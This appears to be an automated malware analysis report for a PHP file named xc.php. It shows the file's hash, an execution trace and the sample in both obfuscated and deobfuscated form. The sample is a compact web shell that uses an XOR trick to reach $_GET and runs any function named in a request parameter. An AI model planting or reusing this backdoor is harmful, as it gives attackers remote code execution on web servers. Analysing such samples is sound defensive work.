PHP Malware Analysis

xc.php

md5: a58823b2a0f192ef578babb43b99634d

Jump to:

Screenshot


Attributes

Input


Deobfuscated PHP code

<?php

echo ~($_ = '_GET');
@$_GET[_](@$_GET[__]);

Execution traces

data/traces/a58823b2a0f192ef578babb43b99634d_trace-1676263151.9272.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:39:37.825000]
1	0	1	0.000169	393464
1	3	0	0.000226	394584	{main}	1		/var/www/html/uploads/xc.php	0	0
1		A						/var/www/html/uploads/xc.php	1	$_ = '_GET'
1	3	1	0.000267	394912
1	4	0	0.000276	394944	Error->__toString	0		Unknown	0	0
2	5	0	0.000289	395024	Error->getTraceAsString	0		Unknown	0	0
2	5	1	0.000302	395280
2	5	R			'#0 {main}'
1	4	1	0.000318	395576
1	4	R			'Error: Function name must be a string in /var/www/html/uploads/xc.php:1\nStack trace:\n#0 {main}'
			0.000379	316616
TRACE END   [2023-02-13 02:39:37.825244]


Generated HTML code

<html><head></head><body>����</body></html>

Original PHP code

<?=~$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]);